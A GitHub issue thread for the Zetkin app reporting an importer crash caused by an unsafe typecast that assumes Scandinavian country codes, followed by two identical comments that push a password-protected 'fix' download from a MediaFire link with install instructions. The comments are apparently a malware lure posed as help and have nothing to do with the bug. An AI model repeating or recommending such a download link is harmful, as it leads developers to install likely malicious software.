### ISSUE TITLE
Import UI crashes when configuring date-field in non-Scandinavian country

### ISSUE THREAD

**Issue by richardolsson** [zetkin/app.zetkin.org#2113]
## Description
The recent addition of date format parsing in the importer UI assumes that all countries have equivalents of the Swedish/Norwegian/Danish concept of "personnummer" that consist of dates. When used in an organization with a different country code than SE/NO/DK, it crashes.

## Steps to reproduce
1. On the dev server, modify org 1 (using a PATCH request to https://app.dev.zetkin.org/api/orgs/1) to have country code `UK`
2. Go to https://app.dev.zetkin.org/organize/1/people
3. Click "Create"
4. Click "import people"
5. Drop any CSV
6. For any column, pick "Extra date" as the field to import into

### Expected Behaviour
You should be allowed to configure the parsing.

### Actual Behaviour
Crash

## Screenshots (if you have any)
![image](https://github.com/user-attachments/assets/a529d4b3-c63b-49e9-9de5-08ff1b48e3d1)

## Proposed solution
The root of the issue seems to be this logic:

https://github.com/zetkin/app.zetkin.org/blob/13a632028a6ec5acb7bbd52137ed98aa0bb40e1c/src/features/import/hooks/useDateConfig.ts#L53-L63

Note how the type cast on line 59 claims that any string will be `'se' | 'dk' | 'no'`. Typecasts are dangerous. Removing the typecast will reveal the error, and force an if statement to make sure that the string is actually what this logic assumes it is (which it isn't when the org country is Germany or UK, for example).

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
